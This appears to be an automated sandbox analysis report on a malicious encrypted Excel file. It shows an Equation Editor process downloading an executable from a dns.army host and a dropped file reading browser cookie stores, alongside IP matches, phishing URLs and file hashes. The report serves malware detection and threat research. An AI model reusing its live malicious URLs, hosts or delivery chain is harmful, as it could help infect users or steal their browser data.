                                                                                                          SecuriteInfo.com.Artemis707F61F6A223.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.225
                                                                                                          New order.PDF.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.224
                                                                                                          SOA.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.225
                                                                                                          7xCBr7CChD.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.224
                                                                                                          Purchase Order no 7770022460.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.224
                                                                                                          Payment slip.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.198.143
                                                                                                          2Dd20YdQDR.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.198.143
                                                                                                          SPpfYOx5Ju.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.225
                                                                                                          ezs8BPdIwM.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.224
                                                                                                          suresb1sndyintercont.dns.armyPRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                                          • 103.153.76.181

                                                                                                          ASN

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          TWIDC-AS-APTWIDCLimitedHKDelivery Note Awd 35378383-84783933.exeGet hashmaliciousBrowse
                                                                                                          • 103.153.182.50
                                                                                                          PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                                          • 103.153.76.181
                                                                                                          Delivery Note Awd 3637368383-938937833.exeGet hashmaliciousBrowse
                                                                                                          • 103.153.182.50
                                                                                                          9oUx9PzdSA.exeGet hashmaliciousBrowse
                                                                                                          • 103.155.92.70
                                                                                                          PAYMENT DOCS.htmlGet hashmaliciousBrowse
                                                                                                          • 103.153.182.184
                                                                                                          Delivery Note Awd 2837939373-840847474.exeGet hashmaliciousBrowse
                                                                                                          • 103.153.182.50
                                                                                                          DTwcHU5qyI.exeGet hashmaliciousBrowse
                                                                                                          • 103.153.215.41
                                                                                                          NormhjTcQb.exeGet hashmaliciousBrowse
                                                                                                          • 103.158.117.234
                                                                                                          https://app.box.com/s/8kw08i72600qzu1i7qj2c537n90a2z20Get hashmaliciousBrowse
                                                                                                          • 103.158.223.22
                                                                                                          https://fornitureee.ru/fvgt45fvdvrbtgevdc/?xujytrhamtion=456rgrfds427Get hashmaliciousBrowse
                                                                                                          • 103.153.182.5
                                                                                                          https://www.canva.com/design/DAEPpAhiSBc/pVb5D_otLEjM848gOGNt8w/view?utm_content=DAEPpAhiSBc&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelinkGet hashmaliciousBrowse
                                                                                                          • 103.153.182.5
                                                                                                          https://artparket24wru.ru/wbv45trvfdcergtgbfvd/?dfvbyu34gb=75446823Get hashmaliciousBrowse
                                                                                                          • 103.153.182.184
                                                                                                          https://www.canva.com/design/DAEOcBy2dTg/1IjeQ8nYTzcxbMsaULT2SQ/view?utm_content=DAEOcBy2dTg&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelinkGet hashmaliciousBrowse
                                                                                                          • 103.153.182.184
                                                                                                          https://got7wco.ru/fvgt45fvdvrbtgevdc/?xujytrhamtion=456rgrfds427Get hashmaliciousBrowse
                                                                                                          • 103.153.182.5
                                                                                                          https://got7wco.ru/fvgt45fvdvrbtgevdc/?xujytrhamtion=456rgrfds427Get hashmaliciousBrowse
                                                                                                          • 103.153.182.5
                                                                                                          https://wtseticket.gb.net/jnhbtrvr4r/?Helmeitas23=56hbgfd3xs#jmanathenghat@phcc.gov.qaGet hashmaliciousBrowse
                                                                                                          • 103.153.182.184
                                                                                                          ACH ADVICE ON 16-11-2020.exeGet hashmaliciousBrowse
                                                                                                          • 103.152.226.83
                                                                                                          Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                                                          • 103.152.226.83
                                                                                                          Scanned from a Xerox Multifunction Printer.jarGet hashmaliciousBrowse
                                                                                                          • 103.153.76.172
                                                                                                          Scanned from a Xerox Multifunction Printer.jarGet hashmaliciousBrowse
                                                                                                          • 103.153.76.172
                                                                                                          PUBLIC-DOMAIN-REGISTRYUSPO#21010028 - SYINDAC QT-00820_pdf.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.223
                                                                                                          para.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.225
                                                                                                          AWB 9899691012 TRACKING INFO_pdf.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.224
                                                                                                          para.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.224
                                                                                                          SIC_9827906277.pdf.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.198.143
                                                                                                          Quotation Prices.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.223
                                                                                                          SecuriteInfo.com.Trojan.PackedNET.519.20020.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.225
                                                                                                          Shipping_Details.exeGet hashmaliciousBrowse
                                                                                                          • 204.11.58.28
                                                                                                          Request.xlsxGet hashmaliciousBrowse
                                                                                                          • 103.53.40.13
                                                                                                          HTG-9066543.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.223
                                                                                                          vA0mtZ7JzJ.exeGet hashmaliciousBrowse
                                                                                                          • 216.10.246.131
                                                                                                          New Order #21076.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.224
                                                                                                          k.dllGet hashmaliciousBrowse
                                                                                                          • 162.215.252.76
                                                                                                          HTMY-209871640.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.198.143
                                                                                                          SecuriteInfo.com.Artemis707F61F6A223.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.225
                                                                                                          SecuriteInfo.com.Trojan.DownLoader36.37393.26064.exeGet hashmaliciousBrowse
                                                                                                          • 43.225.55.205
                                                                                                          New order.PDF.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.224
                                                                                                          certificado.docGet hashmaliciousBrowse
                                                                                                          • 162.215.254.66
                                                                                                          SecuriteInfo.com.Mal.DocDl-K.32352.docGet hashmaliciousBrowse
                                                                                                          • 162.215.254.66
                                                                                                          SecuriteInfo.com.Mal.DocDl-K.460.docGet hashmaliciousBrowse
                                                                                                          • 162.215.254.66
                                                                                                          PUBLIC-DOMAIN-REGISTRYUSPO#21010028 - SYINDAC QT-00820_pdf.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.223
                                                                                                          para.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.225
                                                                                                          AWB 9899691012 TRACKING INFO_pdf.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.224
                                                                                                          para.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.224
                                                                                                          SIC_9827906277.pdf.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.198.143
                                                                                                          Quotation Prices.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.223
                                                                                                          SecuriteInfo.com.Trojan.PackedNET.519.20020.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.225
                                                                                                          Shipping_Details.exeGet hashmaliciousBrowse
                                                                                                          • 204.11.58.28
                                                                                                          Request.xlsxGet hashmaliciousBrowse
                                                                                                          • 103.53.40.13
                                                                                                          HTG-9066543.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.223
                                                                                                          vA0mtZ7JzJ.exeGet hashmaliciousBrowse
                                                                                                          • 216.10.246.131
                                                                                                          New Order #21076.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.224
                                                                                                          k.dllGet hashmaliciousBrowse
                                                                                                          • 162.215.252.76
                                                                                                          HTMY-209871640.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.198.143
                                                                                                          SecuriteInfo.com.Artemis707F61F6A223.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.225
                                                                                                          SecuriteInfo.com.Trojan.DownLoader36.37393.26064.exeGet hashmaliciousBrowse
                                                                                                          • 43.225.55.205
                                                                                                          New order.PDF.exeGet hashmaliciousBrowse
                                                                                                          • 208.91.199.224
                                                                                                          certificado.docGet hashmaliciousBrowse
                                                                                                          • 162.215.254.66
                                                                                                          SecuriteInfo.com.Mal.DocDl-K.32352.docGet hashmaliciousBrowse
                                                                                                          • 162.215.254.66
                                                                                                          SecuriteInfo.com.Mal.DocDl-K.460.docGet hashmaliciousBrowse
                                                                                                          • 162.215.254.66

                                                                                                          JA3 Fingerprints

                                                                                                          No context

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1073152
                                                                                                          Entropy (8bit):7.4331792605351374
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:UEz/ihNaF49GIyUasgV3L84I3QHc4KJ77W1Do3oX/VwbN4+vtE+LtZ/NRMiWitvH:Xz/ihNaF49rgV7JFcLYo3o9wqYTfV
                                                                                                          MD5:411FA0337649AD03B57D223E60680397
                                                                                                          SHA1:9378612B41943680D24AE3E44ECDC5CFF56FD630
                                                                                                          SHA-256:1966492F3A7BAEB08EF6AEFA4FE27203DE08D5965B91448C503FA12B2ADE596D
                                                                                                          SHA-512:F26344A879041C99B8B90E5E3F97A9935FC786DB77C26D87C33763AF3E6B35C3CF23FFD5DFA5B064F5E3A8D818A0B38DC96849CC76EE8F7C97A53ABF3D0BD25D
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Reputation:low
                                                                                                          IE Cache URL:http://suresb1sndyintercont.dns.army/receipst/winlog.exe
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..`..............P.................. ........@.. ....................................@.................................L...O.......|............................................................................ ............... ..H............text........ ...................... ..`.rsrc...|...........................@..@.reloc...............^..............@..B........................H........C...\...............E...........................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....op...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....
                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\188B1E12.jpeg
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):48770
                                                                                                          Entropy (8bit):7.801842363879827
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9CCDB2EB.jpeg
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):48770
                                                                                                          Entropy (8bit):7.801842363879827
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E243FB15.emf
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                          Category:dropped
                                                                                                          Size (bytes):653280
                                                                                                          Entropy (8bit):2.89864943318257
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:v34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:v4UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                          MD5:B48EDBEDB0821DB0627C611FB9FFF7E8
                                                                                                          SHA1:D175A268916620C44C348EAE6F34F37DF325E404
                                                                                                          SHA-256:E25B5950D855CDC8C99E9C68673D90D351EA9865FB4099C79E772D4D1A34D3B6
                                                                                                          SHA-512:436B5F4FEAF6245A4D5FE411330ACE34B6C3892E15B8DD0FC8CFF94A9C089F0467A5AFEF3EBD7B2E2FCBAC5A037876E8FD554E6ED3C326D0CC81733E454ECAAB
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................".$."......."..."..N.U.."...".......".l."..N.U.."...". ....y.Q.."...". ............z.Q............................................X...%...7...................{ .@................C.a.l.i.b.r...............".X....."..."..2.Q.........."..."..{.Q......".....dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                          C:\Users\user\AppData\Roaming\x2nas2ex.vh2\Chrome\Default\Cookies
                                                                                                          Process:C:\Users\Public\vbc.exe
                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28672
                                                                                                          Entropy (8bit):0.9650411582864293
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
                                                                                                          MD5:903C35B27A5774A639A90D5332EEF8E0
                                                                                                          SHA1:5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
                                                                                                          SHA-256:1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
                                                                                                          SHA-512:076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          C:\Users\user\AppData\Roaming\x2nas2ex.vh2\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                                                                                                          Process:C:\Users\Public\vbc.exe
                                                                                                          File Type:SQLite 3.x database, user version 7, last written using SQLite version 3017000
                                                                                                          Category:dropped
                                                                                                          Size (bytes):524288
                                                                                                          Entropy (8bit):0.08107860342777487
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
                                                                                                          MD5:1138F6578C48F43C5597EE203AFF5B27
                                                                                                          SHA1:9B55D0A511E7348E507D818B93F1C99986D33E7B
                                                                                                          SHA-256:EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
                                                                                                          SHA-512:6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          C:\Users\user\Desktop\~$TACSAL.xlsx
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):330
                                                                                                          Entropy (8bit):1.4377382811115937
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                          MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                          Malicious:true
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                          C:\Users\Public\vbc.exe
                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1073152
                                                                                                          Entropy (8bit):7.4331792605351374
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:UEz/ihNaF49GIyUasgV3L84I3QHc4KJ77W1Do3oX/VwbN4+vtE+LtZ/NRMiWitvH:Xz/ihNaF49rgV7JFcLYo3o9wqYTfV
                                                                                                          MD5:411FA0337649AD03B57D223E60680397
                                                                                                          SHA1:9378612B41943680D24AE3E44ECDC5CFF56FD630
                                                                                                          SHA-256:1966492F3A7BAEB08EF6AEFA4FE27203DE08D5965B91448C503FA12B2ADE596D
                                                                                                          SHA-512:F26344A879041C99B8B90E5E3F97A9935FC786DB77C26D87C33763AF3E6B35C3CF23FFD5DFA5B064F5E3A8D818A0B38DC96849CC76EE8F7C97A53ABF3D0BD25D
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Reputation:low
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..`..............P.................. ........@.. ....................................@.................................L...O.......|............................................................................ ............... ..H............text........ ...................... ..`.rsrc...|...........................@..@.reloc...............^..............@..B........................H........C...\...............E...........................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....op...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:CDFV2 Encrypted
                                                                                                          Entropy (8bit):7.996660916028192
                                                                                                          TrID:
                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                          File name:TACSAL.xlsx
                                                                                                          File size:2411520
                                                                                                          MD5:04295ba63eaeb18f062045b0d0106670
                                                                                                          SHA1:daf3e6043fa67319bf7090cdc60bec6303c7f78e
                                                                                                          SHA256:fbc7b775eaa32cdc8daffe7a3db74bc36e06bab32b53d5d65eceb76081f664cd
                                                                                                          SHA512:94c2d2652ad9bc2a37779afd9e7a81db0c27e6bd3649c4d598a806ac3db522b0d2ab8afa0eae5a96e10424a18b56a31041c3c69711feebbd468f5ba58cd521e7
                                                                                                          SSDEEP:49152:s+xg0pV0kFwQvsRH3twbJZv3+vYv9V8preXpjcmXWWs:skgchwQvsZ3twbJZUrCHGWs
                                                                                                          File Content Preview:........................>...................%...................................................................................|.......~...............z.......|.......~...............z.......|.......~...............z......................................

                                                                                                          File Icon

                                                                                                          Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                          Static OLE Info

                                                                                                          General

                                                                                                          Document Type:OLE
                                                                                                          Number of OLE Files:1

                                                                                                          OLE File "TACSAL.xlsx"

                                                                                                          Indicators

                                                                                                          Has Summary Info:False
                                                                                                          Application Name:unknown
                                                                                                          Encrypted Document:True
                                                                                                          Contains Word Document Stream:False
                                                                                                          Contains Workbook/Book Stream:False
                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                          Contains Visio Document Stream:False
                                                                                                          Contains ObjectPool Stream:
                                                                                                          Flash Objects Count:
                                                                                                          Contains VBA Macros:False

                                                                                                          Streams

                                                                                                          Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                          General
                                                                                                          Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                          File Type:data
                                                                                                          Stream Size:64
                                                                                                          Entropy:2.73637206947
                                                                                                          Base64 Encoded:False
                                                                                                          Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                          Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                          Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                          General
                                                                                                          Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                          File Type:data
                                                                                                          Stream Size:112
                                                                                                          Entropy:2.7597816111
                                                                                                          Base64 Encoded:False
                                                                                                          Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                          Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                          Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                          General
                                                                                                          Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                          File Type:data
                                                                                                          Stream Size:200
                                                                                                          Entropy:3.13335930328
                                                                                                          Base64 Encoded:False
                                                                                                          Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                          Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                          Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                          General
                                                                                                          Stream Path:\x6DataSpaces/Version
                                                                                                          File Type:data
                                                                                                          Stream Size:76
                                                                                                          Entropy:2.79079600998
                                                                                                          Base64 Encoded:False
                                                                                                          Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                          Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                          Stream Path: EncryptedPackage, File Type: data, Stream Size: 2388712
                                                                                                          General
                                                                                                          Stream Path:EncryptedPackage
                                                                                                          File Type:data
                                                                                                          Stream Size:2388712
                                                                                                          Entropy:7.9999208389
                                                                                                          Base64 Encoded:True
                                                                                                          Data ASCII:. r $ . . . . . . . . . . q . H . . ' . . . . . ' . r . . . . . . . . . . Y X . 6 . c / Z s . . . 2 ^ z . * i . @ . . . . . . . . . . z . . . 9 . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . * 8 . . . . J . . . . ? { j v . *
                                                                                                          Data Raw:d9 72 24 00 00 00 00 00 c2 a5 cf cf bb 71 91 48 b7 02 27 aa be 13 f9 90 27 bf 72 e9 0a d5 f8 b1 a7 f0 e2 cf c8 59 58 c9 36 97 63 2f 5a 73 88 89 98 32 5e 7a b8 2a 69 db 40 a7 a3 d6 02 f0 db ea 1f f8 c3 7a d8 d5 bc 39 c8 cf 3f 7b 6a 76 dc 2a 38 e4 c1 b9 9b 4a f7 a6 c8 cf 3f 7b 6a 76 dc 2a 38 e4 c1 b9 9b 4a f7 a6 c8 cf 3f 7b 6a 76 dc 2a 38 e4 c1 b9 9b 4a f7 a6 c8 cf 3f 7b 6a 76 dc 2a
                                                                                                          Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                          General
                                                                                                          Stream Path:EncryptionInfo
                                                                                                          File Type:data
                                                                                                          Stream Size:224
                                                                                                          Entropy:4.58330820551
                                                                                                          Base64 Encoded:False
